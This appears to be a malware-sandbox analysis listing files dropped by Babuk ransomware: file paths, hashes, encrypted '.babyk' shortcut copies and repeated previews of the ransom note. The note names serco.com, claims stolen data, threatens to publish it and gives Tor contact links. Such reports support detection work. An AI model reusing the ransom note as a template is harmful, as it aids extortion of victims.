                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Mail Recipient.MAPIMail.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):6.532134231784522
                                                                            Encrypted:false
                                                                            SSDEEP:3:zhr1qwI1ttbTJ9/t6hCjOuPLgr0whhWiXOdOutLyKCMBjiIpxKLUxNvEEn:1cFTTb+3r0wCWOdXs/MBPTKL0vtn
                                                                            MD5:B5569F089F7ECC95FCB835998E8BE9AE
                                                                            SHA1:AD83B5C7D89FF9E21877C42DCF998E0ABFB67C9D
                                                                            SHA-256:B4F6E60032E5E02EEA619C79F6168ECB441CF60DDA783E247D1ED00D344F0400
                                                                            SHA-512:E30407088E2193894C623A20CF671094D01FCBFFC1160543881BE6D565BD977A718E942DD8A2D6DD09623369F3C1C62D1705F28E6BC46E969A7C8865927B6EC4
                                                                            Malicious:false
                                                                            Preview: ..?......P8M.lc1!..A...{W..N.......p..+K...N..T(....+6e..N.E.'...!-..SRT.@K...:..#\s.......}ya.C..x.1i...o_..,$.3...k......+.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Magnify.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1274
                                                                            Entropy (8bit):7.841501897245671
                                                                            Encrypted:false
                                                                            SSDEEP:24:NsIziAHTDmInlMOg2INmBuWpoi3d4G6DjHezfubIMZ2tV5dlfUG:NgATD/lZfimBpoS4vsfuU1t5lf
                                                                            MD5:2E0369BBF7B9360F9662CA6BE50579B1
                                                                            SHA1:1765BE7868C94891C5E568D4F5B51977C92F5A42
                                                                            SHA-256:85CF0942E8E96CBFBE236051AA9762E5A3A75F3377AD431719ED5FCE2BE83737
                                                                            SHA-512:405390A9098DFD49AEFD29DC21D78E1CFECA97FAC3801CE52CE20EA280E8BD64108476FE1F746FA190818A16E3DFF2D119F377EEAB9B68A9CBA11910F174A2B2
                                                                            Malicious:false
                                                                            Preview: .R.E..x.......I....."........".*..].C.9.{{......5...'..=.....k!.]iS?)..$.XR.|...jr..f.A5&Y..BJD........8..~..;.:..c.....G.*.5....7.Zv.Gc.r...f6......W>......Nl..>......e.*.x..}.nW...p.\&~...g.<._.... .-.h.1......gq..).2#y..D......<F..@.H-.48.N...j..a....Wy[..75.:.Cx.B.......P4....Dz' -DL_..!.A/.......r.....8...m/...+.<g.......=....k..8...0.../.{n,.A........"x..Ar.D..Z.l~.j...O...s.&.g...F....X..2.:..cy..j..Cx.m..+.<..h ...(~.............>.....9.a.J..*;R....d......c.L..>(^...}..G..V._.....KkW.......]!.N.!.......Ti...H..6f..koe...v..Dyd.s.Ua<;H..dM.U....i.o.iOL....S.....4 ..4....B#....x.k9W<.#.o.....}....G.....Is..@+_. v.......1)[ha....g....R....@R%.?H..lw..Ar.$.....v)...G..h..g.....4....|............l.....Zw.A1.n....;.(....q...2 ?3....e.8..!E.T..|.YgLz..y.?x.....mm...d.......pS%..!b@9....9.Yb.....9.6..g.~..A.....J......O..l..B......E........>).,j=.....*<...9]..g.w<&.?..Lh&.k......`..4...T.{..EV.S...?t...0..H...s.G`/......2.*.&..CEZV
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Narrator.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1276
                                                                            Entropy (8bit):7.832141356910329
                                                                            Encrypted:false
                                                                            SSDEEP:24:FJLkMhQ1EBrj9Va9toGNB0J3mKXdbBlZe2rzFsPW2UWM:TLky9Su3mKXdfZe6FsuB
                                                                            MD5:8A652956061C57CEC03439009F1C0CEA
                                                                            SHA1:8E82005030C1492BB13555D7C99D0B82FC78B89E
                                                                            SHA-256:35AD3A9978D0C56869B1D73B20A1871A524BC12F48E6A365CB4AA4FC12A253F9
                                                                            SHA-512:8D38110D9EED2BAC5A5CD5B80E5D58340B192BD592434AB36CEAD89310EFF91B7E06B1813DBA3FD82BCBE48A8AD76C9BA8967158EA0502AAA8FD7A5F3200FFC0
                                                                            Malicious:false
                                                                            Preview: ..c..ci:...Lq_.......j.W.7$...r....VVc....Z...9=%....OQ.}...........j..=Q....c..J1.4.)......Rm.h.j.......-..>.@.S._.=..p_.0.9....`-......c........O..V.(...V.S..17R>S..}^. s..%.<A..0b....<U..A..Z.%E2..77...../..9..wf._..e@4..4...M...a.K..+..ij..d0(.5b........?...0d.%x.^.Pi./0_1.o...X.y.....=..T..M.....4.b...<b...k.R9.....<..fu.`..Y.Vl.u..AU.L.v.|.R.u..,..gvp..N.B'.z.................;*h.>.......?L.B.j^[.......c....H(.G.U].Zu....8nd.e,...{;.C.Z..#."...W.`[....!..E.@`Z..O..a`..._hB...\...L.......k..;.%....=....e...f.....Q.+..F3ef."e..-./k.....(.ZZty...;O?.,x.x.~.*:..N2q......N.....D....v`k.....L+...V....4.....7......M....P.e)2..S..?.g..>GI2..U_...n.#.pY:9+.....Y?..-.....x.....?.. f...(W.v.l....r*S.............X.2b.........u.a.~..U..)Zo....i.'1.z1..j.w*.ee.f1S.O..eZ..\6U.}9.\.)......%W.%,...~.3.{.....L.`.9.d...c,.|r..FW0...y.....8.!.1..QT9oG.....~..F...._.6.I....Q......P....S.yr...@.(EWS...O...#...?........"9..1...7..G.r.....Y...../..}D.....Z.%
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\On-Screen Keyboard.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1274
                                                                            Entropy (8bit):7.857344706509644
                                                                            Encrypted:false
                                                                            SSDEEP:24:j4JDgE9CkHGVzh0KRFGkVPe9h/N+NRSA1RBTILO5V5buBZpxzMS7:jmjCsGF7GYef/8RT9UC7uBZQg
                                                                            MD5:E30073E44A5D81975E768A21D76233D1
                                                                            SHA1:B60423D9B1873C9E3D60D66B223561E879F742CE
                                                                            SHA-256:273AAA8977413DAF29E318FF05C7EB631E4FD0C07AB4B440B132C4B869D2A55A
                                                                            SHA-512:48E9E500088992B4B3BF4DFF2901BC3A30F483AE57BC54DFA41EA2D6F3AE0DD5C61711BC595CE389791071853E69FDD9E7209075C07B7887DC5D64B74CFCD41C
                                                                            Malicious:false
                                                                            Preview: ..b.E..u.2a..{.3.K.(u#...L....u..#.... V.$.......C&..[....*.Y....eyP.8.m....14.P.oJS6...<..8....e._X...|.37..SJI.. ..A.....U./.(.....s.p..."..W..C2...$..fwf....$..I...{.U...P.........Bj..(.}i........i./".P..I..Ea....#2.yO.B.+.^./...e..,pt.,'_A...^%E..W.K..U.......t..B.;._2..1g.$9..Q..\.X.W.l..E^...m).]9Jo4..a../......]..5.3.}dS..;zK*.`x.....].<..7j.l.g..k..W.4.n.v.F'.fa....<.".....w6).(.E.....6... ...n6J.5.i/...mBGY.v.))..w.....*.-v.....t5..m,....K..X..;]...J...,."....]f..?.%.[....{....ZxX.RZU.#."V..&..F......5=......Wp;.g....2l..a....h..W...j.[.....b.Z!.........e.YY....I......P1`...l..V.e..+...._.:.J0.P.....;9b6..F.....U........T.........&._I...+p.=..~e....c.....?..)x^...0.^F....$.:....V..>.....P....-.X..9$..+..|..5.....n.^.L'2L..2[.[1.\.E.Ym...b....p:I.,.$j..K?.|c...._.!........,.~.x.......4.I2..X..I.`.V.......J......s]...........(G.... L"...O.&.h{..... T...\....,)..\.2..........&@.O..\...F`.....6.....K,@....[...C......6.'4..e....SL,..._..h
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1326
                                                                            Entropy (8bit):7.848122848078152
                                                                            Encrypted:false
                                                                            SSDEEP:24:a41pIgJCelOvzhAz4A6TcvtYmY/XpSr3jHx3ZIEfDBuU83u1rQWMTuYahZ:a41mMCelOvzGzecFiUr31CE4NuhQPTXO
                                                                            MD5:36E61941673DC14A5D60C2D460956DFD
                                                                            SHA1:094CB52ECA2DEF4F28EDB4AFEFA25863D0E8DFA0
                                                                            SHA-256:2AF2DAF49E456E7CC3DEE9156B404759725ED7064003442F302D5088143CC6E7
                                                                            SHA-512:4330B52DDE44DA3972E44D9A8A59323451FFC289CD13331E031D3E7277294CCEFF4A1BAA4858FB389429410BF24D7E03737AD04F1609E6FDF4E53AC1F9F0AD62
                                                                            Malicious:false
                                                                            Preview: uXJ.>&}.s.6../..r...5d.~...N\ev..-K3C ;bL-.g..8...|'%p.(..<#3.e.#..'S>....3.#.y...%kUqFN.....yb.W.)..~.h..1...s|P.m..|/|@.....N...q.:.JR...9.?...Q...e2..nD=...2RJ.c...{.......D$..c...g..K..S:.........YQ>.V.....`D...Q]|Y...b..TYS.T.....5.Jw.I}.!..)......%.....F]...2k]..b(PRJ......w0.i)...!.PO"..(.....t...=/../2....o.ti.T"..y4.~2G.gI-..w\7...,V...4*.n.1.U..g3.."........<.jZD.-10B..).....H...2.w.....2+*M..}Z.h..B.....l...'..B,.G.)....P0.:e.t......S.l....s..F.o.PO...j..N@..r{AdM..h.w....Q.......~.T.....yZmLH#.s...GK.W...{< ?<..........1|.T..|..=PiW!'l!.7D..).....>.`|.0....c.........>.7{.5..|.rg(%....]..\^...r..I#..lt..9~...68._/..y..F."$L........#...._}.a.]...'M.-.....:o..{.2#cz....E.u......wP^...._.|...".?|z..mv.q(..{`5..z8..5.)..O.2C.!....i..(H../.yxL.i........R..e..hc...).o.2...Tx......g*.i-N3.^v...7Q.U.6/*...A.:...,..=.^=.ARk...4...'7TJ.-...wn5"vn..<.!...7...+!..]....,........gQq|..#....g...-.0.JNu.!..@g..h...9.n..j.k....U...{...5.....*v}
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Command Prompt.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1310
                                                                            Entropy (8bit):7.836666433059391
                                                                            Encrypted:false
                                                                            SSDEEP:24:mWtPZD3RxEE1VtjU+kcsiV1sioHORydr22i1aTJqFNHabHwAWNvKrJW+2EZFKs:RpBn1VtjlRhRyE2iI1c2wnWJRDT
                                                                            MD5:4AD04036421BEB60C67D5A97F1FAF3FB
                                                                            SHA1:82E8B7A556EB6F46B6ED1B79AEECB3D072BC1F70
                                                                            SHA-256:39CD4A0D5F6BEB8910B1F6C65ADEFEE6ABFE1A398501A2BA6FA110DD7A310CBD
                                                                            SHA-512:60507A7A88192EDF69672F8275A02F316607FAEC5C255136DA335A03360C1E9AD6ABA33118F904FADA5A08253564D6D9756AB62B58F93D51FF076707D4E25557
                                                                            Malicious:false
                                                                            Preview: [.[%b./..eI...R..!`......=.Ch..#.{.wz.".R...0.<C7{T2CZ....o|.=...Vb.-#. e."....`.`..Q..../...v.!.Y.T.g.........FF.. }....:.=....ui%.E.HV.%K......%.......)...,).\a.:<N.2.....b..O...p.....c..D.2.S..&.-d..C......x........]..'xjp.v..%...,1...=.#..h{j.d.l.r(Vi....?%......G.RGW...Y..}."y...}.[..2.Z....g.Er..u.n.X. <.l.......$...........e.\.Mab.%sk.n...$?...'_0...~~1.Jv. mI.C.3q.!.Gda&%{G.R.i..4e..B.WA..o..7H.u> .N.......'..:>Ig...K0.....&.|0}..x.t..Bh..z...{....I...s..B...e.[.`....:.]...h7..z..*....\x.0d...'.D....b....n.!(.h.7.K.WTl.....t;I].@.$..S.+..0r39..(..K...}=..u........`.m.zl....Kg.a.4..#a.......yR. .T.B#..^.%..JF].mP..1/.~...."...].x>..u+W.F&...'...f....._^.'.t;...*4..P.9Z.....}...."....p..cw...1......LC..d....[Y5....o.bH$.|......_..R._.3/..R..E.g.cg.-.e:h. ...c!...5.\..>..../7....._{..D..JS.jW&w...q....[.%....z3..1.Q..x6..i.G.r-.l.....n.......u.`......%..oog3.FCOt.0.K.U...nq]bs..w.....-f....r40...q."..WY.m..M2z\>h.....t......E..m\.
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Control Panel.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):573
                                                                            Entropy (8bit):7.599392510100553
                                                                            Encrypted:false
                                                                            SSDEEP:12:2hRwOfvU6BMFwGR/fyQv8xrBX3ZvuAY6+8ZW2V7Q0EMC5lKL4id2D:2H7UkKPjqnZvuKows5lsO
                                                                            MD5:7956B6E2E6F546191D09437379A4FF5D
                                                                            SHA1:3E7E4A008FAB16ADE7C95C3CDDEFFCD5D45BA36B
                                                                            SHA-256:00A19A6E73CA7E30F3E453DFDCD79FC097ED51FAFB9E6D7EFAE732FC4F1E3A3B
                                                                            SHA-512:8F30CE9432101C169DACA7CA3A8C742BB858A92AFDD342CC9214BCD8C01A82BD5D8521040FF37623576DDC7E6BC0BB0D31F8BA50F1B1283A1182FE30CDF7850A
                                                                            Malicious:false
                                                                            Preview: .lq....v.?.....{...q.R!...TH....kei...KBp..h`..M.:.w.....U`s.~A..r(..-..X....r.sw...........+rs...%...7..C)..Hd._...x....).....^..H1.H..w.Fz.U....M....>....{......t..+d.s..ik....v.l.H.5....7...$.o..5M..|r\.87.}~-..wzFA.p..f...e.m`.E,#.........Qi..n..8...1.F#..>(0...;.?x...J...G5.>.D.,.i....s..K.v...z..D6...N...C...../}.u...G..r.y...Xd..zl..s.`?q..x/....\j...W..t..M..+UE..c..vz.E.I._.c....:.s5"...v.[.Z....Q......b7--.V..eG..,..p.t..2.p..J.s..9.x..a&..;.....dP..Wd<...:..,-....W"?......9....#....q.i.......m......choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\File Explorer.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):575
                                                                            Entropy (8bit):7.639694268014616
                                                                            Encrypted:false
                                                                            SSDEEP:12:Po2TL/uappwx4MuVLxDpWZamLgNh/dRxPishmKwq/R:PPXC4/iT8Nh/dRBishpp
                                                                            MD5:97610A583C98C0A082A84BFBCEB69E40
                                                                            SHA1:9B74443E8892FF162C85DFDF68F96EAFA09004FC
                                                                            SHA-256:BEEBAD65906E02FD2A42C41DC13C274B99ADEEB2E2D6EEF1EF042956438ABC91
                                                                            SHA-512:2D158492DCE31B8C1811ED1412CDE51D5FAC65FEEB311DC49C00C0BDF88EEC50864CA7FFBF43A422D3FC4574704CE21AAEFB0178ABFE306F5E80247AFEC4F6B3
                                                                            Malicious:false
                                                                            Preview: 0.$...|..r....D".........c..|!.E....i...i..7.Q.&'..J.*L:m....~..n./....[.r.G...!.Eb.F.A.m _...>..z..J...A....X.$H...?|....w.e[.bbK.l....q.~1....._..Z.4#\...n_.J..[N.w..2'.@.*.U.=s....%.Kj..........M.P............@).v.3^.(>.o..%.[...[..m.-..K...x.......P.D..V....T..S.....*>("v...G......4..U.yZ.+..6.Kj.....t.Jp...1."..]?..%..T,sz.d4.-......_..H......Y..\=D..n..aY.M.%.A.e.'R.I.....?D.?....*...-..=.....s~.-.)X.w..).(i....(..3.Y...&Z....O(...........t^......g\$..<...a.j<........P...n.r..*c..|r.....G.../U.....choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):577
                                                                            Entropy (8bit):7.6390086695897805
                                                                            Encrypted:false
                                                                            SSDEEP:12:xCs52flLcORKzXuZPVOiQ044rDkPgz3bVysMKUwTTqVHcDRqMi0s:RILlRKzXsV1rMPWV3cwTTo2Bw
                                                                            MD5:8F2159943E648B890B89AF3274E677B5
                                                                            SHA1:BD2869B32209DBE4DE663510838EB6C2AAC145CE
                                                                            SHA-256:AD270266219A469EB3C4E8F87C922750387A6694CAC50EB2B4F2C5FA1110F652
                                                                            SHA-512:F9DFC5E6A8A65ED87848E010D18B0DD96E2F15C60009FFF3711889C24EE3C5D51711500D0BE20DA912163BE0E0E5B604B9061326DBC9DCBA1DB2BB626B916C6E
                                                                            Malicious:false
                                                                            Preview: :..'.x....V.~..e%.`9x............/J|..H$.>.+=..Y..FS.@wt.D!.{..mF..9.R...|..Y_.lS.H.t..5#.L8?.%w...[.X.....s..}....e..S..z,..+I.J.....N~@bS|.hF.+u.2...x.=J...9...),......{.2.5)...Vy.w..zKZ......... Wy*DA.hN."c.-..?i.S..Y....R....y3...p.=M....B.<.>Q...`.v.=S....R.Q.........W.Yp.vO......V_}.XV.v.4`....g..C..uo..3.,.Zb.z..G...2jN. ...G.....HsY7..,.......'.D>.y......(...0f0.H."..gt@.(........<Ba..........~..]_....1t4.p.V..mq/3.Z....A.^.V.......1..j....e@...q..Fb... ?3..L.;Nf....H........IE.hI.]..,....!&.......choung dong looks like hot dog!!
                                                                            C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\computer.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):503
                                                                            Entropy (8bit):7.526569841887495
                                                                            Encrypted:false
